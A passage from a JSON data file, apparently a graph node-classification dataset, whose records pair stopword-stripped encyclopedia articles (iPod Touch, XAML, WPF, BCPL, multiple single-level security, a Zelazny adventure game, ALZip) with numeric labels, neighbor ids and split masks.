    "text": "IPod_Touch:ipod touch ipod touch stylized marketed ipod touch brand ios-based all-purpose mobile devices designed marketed apple inc. touchscreen-controlled user interface connects internet wi-fi base stations use cellular network data therefore smartphone similarly iphone used music player digital camera web browser note-logger handheld gaming device may 2013 100 million ipod touch units sold since 2007. ipod touch models sold storage space color models generation typically offering otherwise identical features processors performance available operating system upgrades exception fifth generation low-end 16 gb model initially sold without rear-facing camera current ipod touch seventh-generation model released may 28 2019 ipod touch currently product apple ipod product line following discontinuation ipod nano ipod shuffle july 27 2017 following discontinuation apple revised storage pricing ipod touch 32 128 gb storage ipod touch runs apple unix-based ios operating system called 'iphone os 2010 includes bundled software browse internet view maps send receive email view media work office documents presentations spreadsheets users type virtual keyboard displayed screen apple operates online store allowing users buy directly download music videos third-party software launch ipod touch described journalists 'iphone without phone ipod touch model date introduced release number ios contemporary iphone model successive updates ios since initial release 2007 released additional features iphone os 2.0 released july 11 2008 introduced app store allowed third-party applications first time iphone os 3.0 released june 17 2009 added features cut copy paste data tethering push notification support ios 4.0 released june 21 2010 introduced ibooks facetime multitasking dropped support first generation ipod touch june 2011 ios 5 fifth major release ios software announced apple wwdc 2011 added notification messaging reminder features apple limited features notably voice control system siri iphone ios 6 released september 19 2012 fourth fifth generation ipod touch models contains 200 new features including passbook facebook integration apple maps fifth generation ipod touch gained ability take panoramic photos feature shared iphone 4s iphone 5 june 8 2015 announced wwdc ipod touch fifth generation would support ios 9 along a5 chip devices makes ipod touch fifth generation first ipod touch support four major versions ios recent ios updates free owners supported ipod touch models apple received criticism charging ipod touch owners versions 2.0 3.0 iphone owners received free excluding certain features ipod touch software iphone included apple position could add features free iphone revenue accounted subscription basis accounting rules rather one time payment wwdc june 2010 ios 4 steve jobs announced apple found way make subsequent os upgrades available free ipod touch owners purchase content ipod touch user must create apple id existing account account one may download music videos itunes store apps app store books ibook store apple id account created without credit card used get free content gift cards bought pay apps instead using credit cards convenient users want purchase app song video e-book credit card official way obtain third-party applications ipod touch apple app store branch itunes store app store application available versions ios 2.0 onwards allows users browse download applications single online repository hosted apple itunes store develop software software development kit sdk officially announced march 6 2008 apple town hall meeting ios sdk allows making applications iphone ipod touch paying fee join development team developer set price applications develop receive 70 money earned apple retains 30 sale price minimum fixed fee however saurik developer cydia made tool called cydia impactor tool allowed users provided registered free developer apple id sideload apps onto iphone like apple ios devices ipod touch tightly controlled closed platform modifying replacing operating system voids device warranty communication apps limited controlled apple authorized software vendor hackers attempted 'jailbreak ios devices enable forbidden unsupported features multitasking ios versions 4.0 themes home screen use software apple refused sell battery percentage indicator jailbreaks ipod touch first surfaced month first model released september 2007 hackers released jailbreakme 1.0 also called appsnapp jailbreak iphone os 1.1.1 allowed users install third-party programs devices apple permitted apple warranty statement implies ipod touch jailbreaking modification made unofficial means covered apple warranty jailbreaking violation terms conditions using ios jailbreaking process normally undone performing restore itunes risk bricking device ipod touch generally similar iphone compared same-generation iphone ipod touch thinner lighter less expensive lacking hardware software features steve jobs referred ipod touch training wheels iphone ipod touch models lack touch id face id 3d touch nfc gps earpiece speaker noise-cancelling microphone depending generation ipod touch may smaller inferior display camera newer models 5th 6th 7th generation lack ambient light sensor makes automatic brightness available first second generation ipod touch lacks built-in speaker microphone camera flash starting 5th generation ipod touch support airdrop led flash added ipod touch cellular modem therefore make phone calls however make facetime calls internet connection send imessages iphones macs ipads ipod touches apple id 5th generation ipod touch later forward phone calls separate iphone wi-fi calling feature two devices must paired iphone carrier must support feature 7th generation ipod touch ipod touch units bought october 12 2011 users must mac pc computer able use ipod users must install itunes connect ipod usb port ipod set itunes new ipods bought october 12 2011 ios 5.0 preloaded allow activation wirelessly without need pc mac earlier ipod touch units must plugged computer synced charge ipod touch sync music library videos pictures backup data ios 5 enables user device send icloud service supports macos lion later starting second generation model ipod touch dropped support charging 12 v pin firewire cable charging ipod touch takes 2 hours 80 percent capacity fast charge full charge takes 4 hours fifth sixth seventh generations ipod touch feature new dock connector called lightning replaces 30-pin dock connector older iphone ipad ipod models apple lightning connector eight pins signaling digital new connector smaller previous one allowing slimmer form factor apple lightning cables duplicate pins sides plug makes plug reversible various accessories available connect apple lightning connector older 30-pin dock connector usb although old accessories work lightning connector handle analog signals seven types produced ipod touch devices",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      3602,
      4114,
      5138,
      11289,
      3610,
      7706,
      1057,
      1576,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      7745,
      5191,
      6222,
      5199,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      5733,
      8806,
      3691,
      2673,
      2676,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      11398,
      8842,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      11430,
      171,
      5292,
      2735,
      3248,
      4283,
      3772,
      7869,
      713,
      3790,
      7378,
      2259,
      3286,
      9430,
      218,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      5874,
      6904,
      8441,
      11000,
      7420,
      2819,
      1290,
      3338,
      781,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7983,
      11062,
      7991,
      2361,
      2363,
      2365,
      2366,
      9022,
      10562,
      838,
      7496,
      2388,
      3928,
      4956,
      4957,
      10078,
      6495,
      9063,
      10602,
      3948,
      11629,
      10608,
      5492,
      2439,
      6023,
      6537,
      6539,
      7051,
      7052,
      1428,
      10646,
      3483,
      2979,
      9123,
      11173,
      8109,
      10675,
      2492,
      446,
      7614,
      8641,
      5058,
      2502,
      456,
      1482,
      9163,
      7118,
      464,
      5072,
      6608,
      8662,
      9174,
      10199,
      4061,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      7154,
      5619,
      11254,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 1347,
    "label": 2,
    "text": "Extensible_Application_Markup_Language:extensible application markup language extensible application markup language xaml declarative xml-based language developed microsoft used initializing structured values objects available microsoft open specification promise acronym originally stood extensible avalon markup language avalon code-name windows presentation foundation wpf xaml used extensively .net framework 3.0 .net framework 4.0 technologies particularly windows presentation foundation wpf silverlight windows workflow foundation wf windows runtime xaml framework windows store apps wpf xaml forms user interface markup language define ui elements data binding events features wf workflows defined using xaml xaml also used silverlight applications windows phone apps windows store apps xaml elements map directly common language runtime object instances xaml attributes map common language runtime properties events objects xaml files created edited visual design tools like microsoft expression blend microsoft visual studio hostable windows workflow foundation visual designer also created edited standard text editor code editor like xamlpad graphical editor like vector architect anything created implemented xaml expressed using traditional .net language c visual basic .net however key aspect technology reduced complexity needed tools process xaml based xml consequently variety products emerging particularly wpf space create xaml-based applications xaml simply based xml developers designers able share edit content freely amongst without requiring compilation xaml also benefits declarative definition ui rather procedural code generate xaml file compiled .baml file binary application markup language may inserted resource .net framework assembly run-time framework engine extracts .baml file assembly resources parses creates corresponding wpf visual tree workflow used windows presentation foundation xaml used describe visual user interfaces wpf allows definition 2d 3d objects rotations animations variety effects features used windows workflow foundation contexts xaml used describe potentially long-running declarative logic created process modeling tools rules systems serialization format workflows previously called xoml differentiate ui markup use xaml longer distinguished however file extension files containing workflow markup still xoml xaml uses specific way define look feel called template differing cascading style sheet syntax closer xbl windows presentation foundation example shows text hello world top-level xaml container called canvas schema xmlns= http //schemas.microsoft.com ... part may changed work computer using schema microsoft recommends example also integrated web page wpf installed using xbaps xaml browser applications compiled applications running sandboxed environment hosted within browser another way use silverlight plugin code included directly html page rather must loaded page via javascript .net 3.0 later installed loose xaml files also viewed compatible web browser including internet explorer firefox conjunction .net framework 3.0 without need silverlight plugin loose xaml files markup-only files limited defining visual content rendered compiled application mysilverlight.js file must contain code loads xaml code xml file mysilverlight html element crucial part utilizing xaml full potential making appropriate usage binding well comfortable creating custom user elements required specific needs binding done follows four microsoft main implementations xaml versions differences parsing behavior additionally silverlight 4 xaml parser 100 backward compatible silverlight 3 files silverlight 3 accepted xaml files may accepted parsed differently silverlight 4 parser european committee interoperable systems said 2007 microsoft use xaml silverlight product aimed introduce content world wide web could accessed windows platform using plugin xaml viewable non-microsoft browsers windows linux mac microsoft supported novell silverlight viewer gnu/linux called moonlight january 2010 moonlight 2 compatible silverlight 2 development moonlight later discontinued",
    "neighbors": [
      9,
      2062,
      9245,
      8227,
      2603,
      5165,
      5677,
      3631,
      9263,
      6709,
      576,
      8771,
      83,
      6230,
      10841,
      608,
      2145,
      2658,
      5743,
      8303,
      2673,
      8304,
      9848,
      5754,
      7292,
      1664,
      1666,
      9348,
      4231,
      1162,
      6797,
      10900,
      3734,
      10902,
      3224,
      11414,
      10406,
      4777,
      2221,
      11442,
      692,
      4822,
      9943,
      9434,
      10470,
      3303,
      3821,
      10480,
      4853,
      6408,
      11023,
      5904,
      9491,
      1812,
      11030,
      5401,
      4384,
      3876,
      11559,
      3881,
      11570,
      823,
      315,
      319,
      1348,
      8524,
      847,
      3921,
      1366,
      345,
      2401,
      8554,
      9579,
      7539,
      5492,
      2943,
      10624,
      3462,
      8582,
      9100,
      7064,
      3997,
      10654,
      9128,
      4010,
      8618,
      10157,
      8627,
      8628,
      8644,
      2501,
      4550,
      7629,
      4564,
      5078,
      1501,
      479,
      9192,
      5612,
      3573,
      9205,
      2045,
      9726
    ],
    "mask": "None"
  },
  {
    "node_id": 1348,
    "label": 2,
    "text": "Windows_Presentation_Foundation:windows presentation foundation windows presentation foundation wpf graphical subsystem similar winforms microsoft rendering user interfaces windows-based applications wpf previously known avalon initially released part .net framework 3.0 2006 wpf uses directx attempts provide consistent programming model building applications separates user interface business logic resembles similar xml-oriented object models implemented xul svg wpf employs xaml xml-based language define link various interface elements wpf applications deployed standalone desktop programs hosted embedded object website wpf aims unify number common user interface elements 2d/3d rendering fixed adaptive documents typography vector graphics runtime animation pre-rendered media elements linked manipulated based various events user interactions data bindings wpf runtime libraries included versions microsoft windows since windows vista windows server 2008 users windows xp sp2/sp3 windows server 2003 optionally install necessary libraries microsoft silverlight provided functionality mostly subset wpf provide embedded web controls comparable adobe flash 3d runtime rendering supported silverlight since silverlight 5 microsoft connect event december 4 2018 microsoft announced releasing wpf open source project github released mit license windows presentation foundation become available projects targeting .net core framework however system cross-platform still available windows graphics including desktop items like windows rendered using direct3d allows display complex graphics custom themes cost gdi wider range support uniform control theming allows windows offload graphics tasks gpu reduces workload computer cpu gpus optimized parallel pixel computations tends speed screen refreshes cost decreased compatibility markets gpus necessarily powerful netbook market windows presentation foundation wpf microsoft ui framework create applications rich user experience part .net framework 3.0 higher wpf emphasis vector graphics allows controls elements scaled without loss quality pixelization thus increasing accessibility exception silverlight direct3d integration allows streamlined 3d rendering addition interactive 2d content overlaid 3d surfaces natively control templates data templates enable use winforms developer executes wpf c code system.windows.forms.integration.windowsformshost.enablewindowsformsinterop following success markup languages web development wpf introduces extensible application markup language xaml based xml xaml designed efficient method developing application user interfaces specific advantage xaml brings wpf xaml completely declarative language allowing developer designer describe behavior integration components without use procedural programming although rare entire application built completely xaml introduction xaml allows application designers effectively contribute application development cycle using xaml develop user interfaces also allows separation model view considered good architectural principle xaml elements attributes map classes properties underlying apis web development layouts specific themes well suited markup xaml required either indeed elements wpf may coded .net language c vb.net xaml code ultimately compiled managed assembly way .net languages architecture wpf spans managed code native code components however public api exposed available via managed code majority wpf managed code composition engine renders wpf applications native component named media integration layer mil resides codice_5 interfaces directly directx provides basic support 2d 3d surfaces timer-controlled manipulation contents surface view exposing animation constructs higher level compositing individual elements wpf application final 3d scene represents ui application renders screen desktop window manager also uses mil desktop window composition media codecs also implemented unmanaged code shipped codice_6 managed world presentationcore codice_7 provides managed wrapper mil implements core services wpf including property system aware dependencies setters consumers property message dispatching system means codice_8 object implement specialized event system services implement layout system measurement ui elements presentationframework codice_9 implements end-user presentational features including layouts time-dependent story-board based animations data binding wpf exposes property system objects inherit codice_10 aware dependencies consumers property trigger actions based changes properties properties either hard coded values expressions specific expressions evaluate result initial release however set expressions supported closed value properties inherited parent objects well wpf properties support change notifications invoke bound behaviors whenever property element changed custom behaviors used propagate property change notification across set wpf objects used layout system trigger recalculation layout property-changes thus exposing declarative programming style wpf whereby almost everything setting colors positions animating elements achieved setting properties allows wpf applications written xaml declarative mark-up language binding keywords attributes directly wpf classes properties interface elements wpf application maintained class codice_11 objects visual objects provide managed interface composition tree maintained media integration layer mil element wpf creates adds one composition nodes tree composition nodes contain rendering instructions clipping transformation instructions along visual attributes thus entire application represented collection composition nodes stored buffer system memory periodically mil walks tree executes rendering instructions node thus compositing element directx surface rendered screen mil uses painter algorithm components rendered back screen front allows complex effects like transparencies easily achieved rendering process hardware accelerated using gpu composition tree cached mil creating retained mode graphics changes composition tree needs incrementally communicated mil also frees applications managing repainting screen mil information necessary animations implemented time-triggered changes composition tree user visible side animations specified declaratively setting animation effect element via property specifying duration code-behind updates specific nodes tree via codice_11 objects represent intermediate states specified time intervals well final state element mil render changes element automatically wpf applications start two threads one managing ui another background thread handling rendering repainting rendering repainting managed wpf without developer intervention ui thread houses dispatcher via instance codice_13 maintains queue ui operations need performed tree codice_11 objects sorted priority ui events including changing property affects layout user interaction events raised queued dispatcher invokes handlers events microsoft recommends event handlers update properties reflect new content application responsiveness new content generated retrieved background thread render thread picks copy visual tree walks tree calculating components visible renders direct3d surfaces render thread also caches visual tree changes tree need communicated result updating changed pixels wpf supports extensible layout model layout divided two phases measure arrange measure phase recursively calls elements determines size take arrange phase child elements recursively arranged parents invoking layout algorithm layout module use number development tools available developing windows presentation foundation applications wpf deployment model offers standalone xaml browser applications xbap pronounced ex-bap flavors programming model building either type application similar standalone applications locally installed computer using software clickonce windows installer msi run desktop standalone applications considered full trust full access computer resources xaml browser applications xbaps programs hosted inside web browser pre-.net4 xbap applications run partial trust sandbox environment given full access computer resources wpf functionality available hosted environment intended protect computer malicious applications xbaps run fully trusted applications .net 4 full access computer resources starting xbap html page vice versa seamless security installation prompt although one gets perception application running browser actually runs out-of-process executable different browser release .net framework 3.0 xbaps would run ie release .net framework 3.5 sp1 xbap also runs mozilla firefox using included extension october 16 2009 mozilla added firefox plugin extension add-ons blocklist remotely exploitable serious security vulnerability agreement microsoft two days later block removed windows 7 firefox plugin run default reinstallation .net framework 3.5 sp1 install plugin add support xbap applications firefox alternatively hard-copying plugin dlls working windows xp/vista installation plugin directory mozilla firefox also reinstate support xbap applications wpf plugin dlls reside following directories depending framework version silverlight codenamed wpf/e deprecated cross-browser browser plugin contained wpf-based technology including xaml provided features video vector graphics animations multiple operating systems including windows 7 windows vista windows xp mac os x. microsoft sanctioned limited number 3rd party developers work ports certain linux distributions specifically provided add-on mozilla firefox internet explorer 6 google chrome 42 apple safari .net micro framework includes gui object model loosely based wpf although without support xaml",
    "neighbors": [
      10243,
      2062,
      10769,
      9234,
      1043,
      9245,
      1055,
      5154,
      2083,
      8227,
      1577,
      2603,
      1581,
      5165,
      3631,
      4143,
      5677,
      5681,
      9263,
      11316,
      1077,
      6709,
      8246,
      576,
      8771,
      1098,
      4174,
      4178,
      83,
      9813,
      8281,
      10841,
      603,
      5727,
      608,
      2145,
      2658,
      5743,
      8303,
      2673,
      8304,
      1656,
      9848,
      5754,
      7292,
      9340,
      1664,
      5761,
      1666,
      9348,
      5765,
      10886,
      2183,
      4231,
      5259,
      653,
      6797,
      10900,
      3734,
      10902,
      3224,
      11414,
      4771,
      7846,
      4777,
      2221,
      10414,
      11442,
      692,
      8391,
      214,
      4822,
      9430,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      11487,
      4836,
      10470,
      3303,
      1770,
      11498,
      3821,
      10991,
      1776,
      6385,
      10480,
      2804,
      4853,
      254,
      6927,
      5904,
      9491,
      1812,
      11030,
      5401,
      5913,
      11546,
      4384,
      9505,
      3876,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      823,
      315,
      1856,
      5952,
      1347,
      844,
      8524,
      847,
      8015,
      1366,
      10079,
      11616,
      2401,
      8554,
      9579,
      4972,
      5492,
      2943,
      8576,
      10624,
      3462,
      8582,
      2441,
      9609,
      9612,
      7064,
      9114,
      3997,
      10654,
      8607,
      10658,
      11683,
      9128,
      4010,
      8618,
      10157,
      6584,
      2493,
      8644,
      4550,
      7629,
      479,
      8161,
      6114,
      4074,
      5612,
      9196,
      4590,
      11247,
      3573,
      9205,
      10229,
      10747,
      2045,
      9726,
      5119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1349,
    "label": 9,
    "text": "BCPL:bcpl bcpl basic combined programming language procedural imperative structured computer programming language originally intended writing compilers languages bcpl longer common use however influence still felt stripped syntactically changed version bcpl called b language c programming language based bcpl introduced several features many modern programming languages including using curly braces delimit code blocks bcpl designed small simple compilers could written reputedly compilers could run 16 kilobytes original compiler written bcpl easily portable bcpl thus popular choice bootstrapping system major reason compiler portability lay structure split two parts front end parsed source generated o-code back end took o-code translated code target machine 1/5 compiler code needed rewritten support new machine task usually took 2 5 man-months approach became common practice later e.g pascal java language unusual one data type word fixed number bits usually chosen align architecture machine word adequate capacity represent valid storage address many machines time data type 16-bit word choice later proved significant problem bcpl used machines smallest addressable item word byte machines larger word sizes 32-bit 64-bit interpretation value determined operators used process values example codice_1 added two values together treating integers codice_2 indirected value effectively treating pointer order work implementation provided type checking hungarian notation developed help programmers avoid inadvertent type errors mismatch bcpl word orientation byte-oriented hardware addressed several ways one providing standard library routines packing unpacking words byte strings later two language features added bit-field selection operator infix byte indirection operator denoted codice_3 bcpl handles bindings spanning separate compilation units unique way user-declarable global variables instead global vector similar blank common fortran data shared different compilation units comprises scalars pointers vectors stored pre-arranged place global vector thus header files files included compilation using get directive become primary means synchronizing global data compilation units containing global directives present lists symbolic names paired number associates name corresponding numerically addressed word global vector well variables global vector contains bindings external procedures makes dynamic loading compilation units simple achieve instead relying link loader underlying implementation effectively bcpl gives programmer control linking process global vector also made simple replace augment standard library routines program could save pointer global vector original routine replace pointer alternative version alternative might call original part processing could used quick ad hoc debugging aid bcpl first brace programming language braces survived syntactical changes become common means denoting program source code statements practice limited keyboards day source programs often used sequences codice_4 codice_5 place symbols codice_6 codice_7 single-line codice_8 comments bcpl adopted c reappeared c++ later c99 book bcpl language compiler describes philosophy bcpl follows programs run using martin richards current version cintsys december 2018 libhdr start writef must changed lower case avoid errors print factorials count solutions n queens problem bcpl first implemented martin richards university cambridge 1967 bcpl response difficulties predecessor cambridge programming language later renamed combined programming language cpl designed early 1960s richards created bcpl removing features full language make compilation difficult first compiler implementation ibm 7094 compatible time-sharing system ctss written richards visiting project mac massachusetts institute technology mit spring 1967 language first described paper presented 1969 spring joint computer conference bcpl rumored originally stood bootstrap cambridge programming language cpl never created since development stopped bcpl acronym later reinterpreted bcpl book bcpl language original hello world program written first mud also written bcpl mud1 several operating systems written partially wholly bcpl example tripos earliest versions amigados bcpl also initial language used seminal xerox parc alto project first modern personal computer among projects bravo document preparation system written bcpl early compiler bootstrapped 1969 starting paper tape o-code martin richards atlas 2 compiler targeted ict 1900 series two machines different word-lengths 48 vs 24 bits different character encodings different packed string representations—and successful bootstrapping increased confidence practicality method late 1970 implementations existed honeywell 635 honeywell 645 ibm 360 pdp-10 tx-2 cdc 6400 univac 1108 pdp-9 kdf 9 atlas 2 1974 dialect bcpl implemented bbn without using intermediate o-code initial implementation cross-compiler hosted bbn tenex pdp-10s directly targeted pdp-11s used bbn implementation second generation imps used arpanet also version produced bbc micro mid-1980s richards computer products company started john richards brother dr. martin richards bbc domesday project made use language versions bcpl amstrad cpc amstrad pcw computers also released 1986 uk software house arnor ltd. macbcpl released apple macintosh 1985 topexpress ltd kensington england design philosophy bcpl strongly influenced b turn influenced c. programmers time debated whether eventual successor c would called next letter alphabet p next letter parent language name language accepted c successor c++ codice_9 c increment operator although programming language also exists 1979 implementations bcpl existed least 25 architectures language gradually fell favour c became popular non-unix systems martin richards maintains modern version bcpl website last updated 2018 set run various systems including linux freebsd mac os x raspberry pi latest distribution includes graphics sound libraries comprehensive manual pdf format continues program including research musical automated score following",
    "neighbors": [
      512,
      9345,
      5635,
      4998,
      1804,
      8973,
      10638,
      11023,
      6160,
      6675,
      8474,
      1435,
      10143,
      1952,
      10145,
      8868,
      5165,
      3374,
      5677,
      7983,
      8369,
      8879,
      7479,
      7480,
      6075,
      1343,
      8262,
      3529,
      1610,
      1611,
      8140,
      8524,
      10703,
      11219,
      9047,
      6233,
      6242,
      6248,
      7019,
      8429,
      499,
      9331,
      7158,
      3960,
      2045,
      11390
    ],
    "mask": "Test"
  },
  {
    "node_id": 1350,
    "label": 4,
    "text": "Multiple_single-level:multiple single-level multiple single-level multi-security level msl means separate different levels data using separate computers virtual machines level aims give benefits multilevel security without needing special changes os applications cost needing extra hardware drive develop mls operating systems severely hampered dramatic fall data processing costs early 1990s advent desktop computing users classified processing requirements either spend lot money dedicated computer use one hosted mls operating system throughout 1990s however many offices defense intelligence communities took advantage falling computing costs deploy desktop systems classified operate highest classification level used organization desktop computers operated system high mode connected lans carried traffic level computers msl implementations neatly avoided complexities mls traded technical simplicity inefficient use space users classified environments also needed unclassified systems users often least two computers sometimes one unclassified processing one classification level processed addition computer connected lan appropriate classification level meaning multiple dedicated cabling plants incorporated considerable cost terms installation maintenance obvious shortcoming msl compared mls support immixture various classification levels manner example notion concatenating secret data stream taken secret file top secret data stream read top secret file directing resultant top secret data stream top secret file unsupported essence msl system thought set parallel collocated computer systems restricted operation one one security level indeed individual msl operating systems may even understand concept security levels since operate single-level systems example one set collocated msl os may configured affix character string secret output os understanding data compares sensitivity criticality data processed peer os affixes string unclassified output operating across two security levels must use methods extraneous purview msl operating systems per se needing human intervention termed manual review example independent monitor brinch hansen sense term may provided support migration data among multiple msl peers e.g copying data file unclassified peer secret peer although strict requirements way federal legislation specifically address concern would appropriate monitor quite small purpose-built supportive small number rigidly defined operations importing exporting files configuring output labels maintenance/administration tasks require handling collocated msl peers unit rather individual single-level systems may also appropriate utilize hypervisor software architecture vmware provide set peer msl os form distinct virtualized environments supported underlying os accessible administrators cleared data managed peers users perspectives peer would present login x display manager session logically indistinguishable underlying maintenance os user environment cost complexity involved maintaining distinct networks level classification led national security agency nsa begin research ways msl concept dedicated system high systems could preserved reducing physical investment demanded multiple networks computers periods processing first advance area establishing protocols agencies could connect computer network one classification process information sanitize system connect different network another classification periods processing model offered promise single computer nothing reduce multiple cabling plants proved enormously inconvenient users accordingly adoption limited 1990s rise virtualization technology changed playing field msl systems suddenly possible create virtual machines vms behaved independent computers ran common hardware platform virtualization nsa saw way preserve periods processing virtual level longer needing physical system sanitized performing processing within dedicated system-high vms make msl work virtual environment however necessary find way securely control virtual session manager ensure compromising activity directed one vm could compromise another nsa pursued multiple programs aimed creating viable secure msl technologies leveraging virtualization date three major solutions materialized nettop trusted multi-net solutions approved use addition trusted computer solutions developed thin-client product originally based nettop technology concepts licensing agreement nsa product called secureoffice r trusted thin client tm runs lspp configuration red hat enterprise linux version 5 rhel5 three competing companies implemented mils separation kernels addition advances development non-virtualization msl systems use specialized hardware resulting least one viable solution interesting consider philosophical implications msl solution path rather providing mls abilities within classical os chosen direction build set virtual os peers managed individually collective underlying real os underlying os let us introduce term maintenance operating system mos sufficient understanding mls semantics prevent grievous errors copying data top secret msl peer unclassified msl peer mos must ability represent labels associate labels entities rigorously avoid terms subject object compare labels rigorously avoiding term reference monitor distinguish contexts labels meaningful rigorously avoiding term trusted computing base tcb list goes one readily perceives mls architecture design issues eliminated merely deferred separate stratum software invisibly manages mandatory access control concerns superjacent strata need concept none geminal architectural concept taken anderson report underlying dod-style trusted systems first place positively achieved set-of-msl-peers abstraction albeit radical restriction scope mac-cognizant software mechanisms small subjacent mos accomplished however cost eliminating practical mls abilities even elementary ones secret-cleared user appends unclassified paragraph taken unclassified file secret report msl implementation would obviously require every reusable resource example unclassified file replicated across every msl peer might find useful—meaning either much secondary storage needlessly expended intolerable burden cleared administrator able effect replications response users requests therefor course since secret user browse system unclassified offerings logging beginning unclassified system afresh one evidences yet another severe limitation functionality flexibility alternatively less sensitive file systems could nfs-mounted read-only trustworthy users could browse modify content albeit mls os peer would actual means distinguishing via directory listing command e.g nfs-mounted resources different level sensitivity local resources strict means preventing illegal uphill flow sensitive information brute-force all-or-nothing mechanism read-only nfs mounting demonstrate handicap drastic effectuation cross-level file sharing actually consider case mls system supports unclassified secret top secret data top secret cleared user logs system level mls directory structures built around containment principle loosely speaking dictates higher sensitivity levels reside deeper tree commonly level directory must match dominate parent level file specifically link thereto must match directory catalogs strictly true mls unix alternatives support different conceptions directories directory entries i-nodes etc —such multics adds branch abstraction directory paradigm—tolerate broader set alternative implementations orthogonal mechanisms provided publicly shared spool directories /tmp c \\temp automatically—and invisibly—partitioned os users file access requests automatically deflected appropriately labeled directory partition top secret user free browse entire system restriction that—while logged level—he allowed create fresh top secret files within specific directories descendants msl alternative browsable content must specifically laboriously replicated across applicable levels fully cleared administrator—meaning case secret data must replicated top secret msl peer os unclassified data must replicated secret top secret peers—one readily perceive highly cleared user frustrating timesharing computing experience classical trusted systems-theoretic sense—relying upon terminology concepts taken orange book foundation trusted computing—a system supports msl peers could achieve level assurance beyond b1 b2 criteria require among things clear identification tcb perimeter existence single identifiable entity ability authority adjudicate access data represented throughout accessible resources adp system real sense application term high assurance descriptor msl implementations nonsensical since term high assurance properly limited b3 a1 systems—and laxity albeit b2 systems msl systems whether virtual physical nature designed preserve isolation different classification levels consequently unlike mls systems msl environment innate abilities move data one level another permit data sharing computers working different classification levels sites deploy cross-domain solutions cds commonly referred gatekeepers guards guards often leverage mls technologies filter traffic flowing networks unlike commercial internet firewall however guard built much stringent assurance requirements filtering carefully designed try prevent improper leakage classified information lans operating different security levels data diode technologies used extensively data flows required restricted one direction levels high level assurance data flow opposite direction general subject restrictions imposed challenges mls solutions strict security assessment need provide electronic equivalent stated policy moving information classifications moving information classification level particularly challenging typically requires approval several different people late 2005 numerous high-assurance platforms guard applications approved use classified environments n.b term high-assurance employed evaluated context dcid 6/3 read dee skid six three quasi-technical guide construction deployment various systems processing classified information lacking precise legal rigidity orange book criteria underlying mathematical rigor orange book motivated derived logical chain reasoning constructed follows secure state mathematically defined mathematical model constructed operations upon preserve secure state conceivable sequence operations starting secure state yields secure state b mapping judiciously chosen primitives sequences operations upon model c descriptive top-level specification maps actions transacted user interface system calls sequences primitives stopping short either formally demonstrating live software implementation correctly implements said sequences actions e formally arguing executable trusted system generated correct reliable tools e.g compilers librarians linkers",
    "neighbors": [
      10170,
      6593,
      4067,
      3652,
      8904,
      2761,
      4201,
      6153,
      8302,
      7887,
      11470,
      5435,
      4914,
      6772,
      3480,
      2426,
      5371,
      5247
    ],
    "mask": "None"
  },
  {
    "node_id": 1351,
    "label": 3,
    "text": "Nine_Princes_in_Amber_(video_game):nine princes amber video game nine princes amber interactive fiction computer game graphics game published telarium subsidiary spinnaker software 1985 game based upon fantasy novels nine princes amber guns avalon roger zelazny single-player adventure controlled via typed keyboard commands words sentences entered text parser player uses action commands e.g take sit communication commands e.g ask demand hug interaction non-player characters 40 different possible solutions end game plot takes place fictional fantasy world player prince corwin son king oberon rules kingdom amber corwin wants become king eight brothers especially brother eric also interested throne amber prince corwin must escape assassination attempts intrigues enacted siblings yet must forge alliances siblings become reigning king amber adventure static 2d graphics theme song sound effects implemented c 64 dos atari st msx2 apple ii msx2 version translation spanish nueve principes en amber new illustrations game based upon fantasy novels nine princes amber doubleday 1970 guns avalon doubleday 1972 roger zelazny developed group 20 people spinnaker software published telarium 1985 design writing game coding done andrea bird year 1986 german reviewer called nine princes amber precious adventure edel-adventure praised intelligent writings suspenseful storyline text parser 2006 study history interactive fiction maintained one hand nine princes amber bad game – fact one telarium ’ best working conversational 'puzzles actually oddly satisfying times hand authors seemed aiming much higher wanted create ambitious gameplay hardware constraints 1980s general limitations character interaction interactive fiction able actualize aim completely antic 1987 stated game uneven plot pacing content ranging exciting banal magazine criticized port 8-bit computers fully using atari st powerful graphics sound substandard text parser reviewer described game essentially computerized 'classics illustrated adaptation books rather adventure game infocom even scott adams tradition stating finished two interrupted hours finishing game however found reloading saved games see another 40 endings interesting reviewer concluded game comes short simply interesting well-executed enough recommended suggesting readers buy pawn instead",
    "neighbors": [
      6407
    ],
    "mask": "Test"
  },
  {
    "node_id": 1352,
    "label": 6,
    "text": "ALZip:alzip alzip archive compression utility estsoft microsoft windows alzip file compression program unzip 40 different zip file archives alzip zip files 8 different archives zip egg tar others alzip version 8 alzip ’ egg format unicode powerful function supported used originally alzip developed 1999 internal application south korean software company estsoft response employee frustration using english interface winzip korean interface immediately well received later year alzip publicly released freeware year alzip became popular zip program korea december 2001 top downloaded software country 2004 reached 70 market share south korea popularity software alz archive format played large role earning estsoft place digital innovation awards top 100 companies south korea software taking special mention early development alzip introduced alz file format deal file size limitations zip file format alz compression theoretical upper limit file sizes limited operating system limits amount available storage file format become common korea first english version released 2002 since support 20 languages added originally alzip released pure freeware however october 2001 changed free home use government usage requiring software license april 2002 business license also introduced commercial usage licensing based honor system nag screens version 7 release license changed freeware adware displaying downloaded banner ads finally beginning 1 december 2008 new releases shareware requiring paid license except original korean language requires licensing fee version 8.51 22 august 2012 alzip changed license licensed free charge download page alzip serial number copy paste start alzip order license software free charge name alzip chosen al part transliteration korean aljip hangul 알집 literally eggzip altools feature similar egghead cartoon characters mascots program additionally alzip integrates new folder function windows explorer new folders created option using custom icons names 2003 controversy alzip compression file format alz developer another korean compression utility 빵집 insisted alzip users forced use alzip archiver decompressing alz files also insisted estsoft offer decompression libraries third-party archiver developers used reverse engineering develop algorithms current version 빵집 supports alz format alzip 8.0 beta version estsoft made format *.egg",
    "neighbors": [
      6022,
      1801,
      10121,
      1420,
      6797,
      1940,
      3222,
      9880,
      3114,
      10027,
